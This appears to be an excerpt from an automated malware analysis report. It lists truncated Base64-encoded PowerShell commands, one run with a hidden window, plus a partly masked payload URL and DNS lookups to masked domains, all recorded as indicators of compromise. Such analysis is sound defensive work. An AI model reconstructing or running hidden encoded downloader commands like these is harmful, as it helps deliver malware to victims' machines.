Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATQBpAHAAYQBtAGkAZwBtAHoAbQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBHAGsAeAB4AHIAYQBpAGQAIAAjAD4AIAAkAEIAagBuAHgAeQBpAGIAbQBnAHgAYgBuAHkAPQAnAEMAcgB5A...
- http://ma###ocs.com/wp-admin/JH/
- DNS ASK st###.aca-apac.com
- DNS ASK le###757.com
- DNS ASK ma###ocs.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATQBpAHAAYQBtAGkAZwBtAHoAbQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBHAGsAeAB4AHIAYQBpAGQAIAAjAD4AIAAkAEIAagBuAHgAeQBpAGIAbQBnAHgAYgBuAHkAPQAnAEMAcgB5A...' (with hidden window)